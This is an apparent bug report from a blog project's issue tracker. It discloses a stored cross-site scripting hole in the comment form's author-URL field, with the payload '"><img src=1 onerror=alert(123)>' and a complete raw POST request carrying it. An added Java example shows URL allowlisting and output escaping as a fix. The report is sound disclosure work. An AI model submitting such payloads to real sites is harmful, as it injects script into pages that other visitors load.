Closed
Description
I confirm that I have checked (mark [ ] as [x])
I want to request (mark [ ] as [x])
- Bug report
- Add a new feature or function
- Request technical support
Bug Report
I find that you have done HtmlUtil.escape for CommentContent

but do nothing with CommentAuthorUrl

payload: commentAuthorUrl="><img src=1 onerror=alert(123)>

POST /newComment HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 306
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.0.0.2

postId=3&commentContent=sasas&commentAuthor=as12%22%3E%3Ca%3E3&commentAuthorEmail=&commentAuthorUrl=%22%3E%3Cimg+src%3D1+onerror%3Dalert(123)%3E233&commentAgent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F73.0.3683.47+Safari%2F537.36&commentParent=28
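
One way to close the gap this report describes, as an added example that is not part of the original issue or the project's code: accept commentAuthorUrl only as an absolute http(s) URL on input, and HTML-escape it again when it is written into an attribute. The class name, `sanitizeAuthorUrl`, `renderAuthor` and the link template are assumptions, and `escapeHtml` is a dependency-free stand-in for the escaping the report says is already applied to the comment content.

```java
import java.net.URI;
import java.net.URISyntaxException;

public class CommentAuthorUrlDemo {

    // Minimal escaper for HTML text and quoted attribute values (stand-in, see lead-in).
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Input check: keep only absolute http(s) URLs with a host; everything else becomes "".
    static String sanitizeAuthorUrl(String raw) {
        if (raw == null) return "";
        try {
            URI uri = new URI(raw.trim());
            String scheme = uri.getScheme();
            boolean web = "http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme);
            if (web && uri.getHost() != null) return uri.toASCIIString();
        } catch (URISyntaxException e) {
            // Malformed input (quotes, angle brackets, spaces) is rejected below.
        }
        return "";
    }

    // Hypothetical template fragment: the author name linked to the author URL.
    static String renderAuthor(String name, String url) {
        return "<a href=\"" + escapeHtml(sanitizeAuthorUrl(url)) + "\">"
                + escapeHtml(name) + "</a>";
    }

    public static void main(String[] args) {
        // Field values as they decode from the request body in the report.
        String reportedUrl = "\"><img src=1 onerror=alert(123)>233";
        String reportedName = "as12\"><a>3";
        System.out.println(renderAuthor(reportedName, reportedUrl));
        System.out.println(renderAuthor("alice", "https://example.org/blog?a=1&b=2"));
    }
}
```

The scheme allowlist matters independently of escaping: a `javascript:` URL contains no characters that HTML escaping changes, so escaping alone would still leave it usable inside `href`.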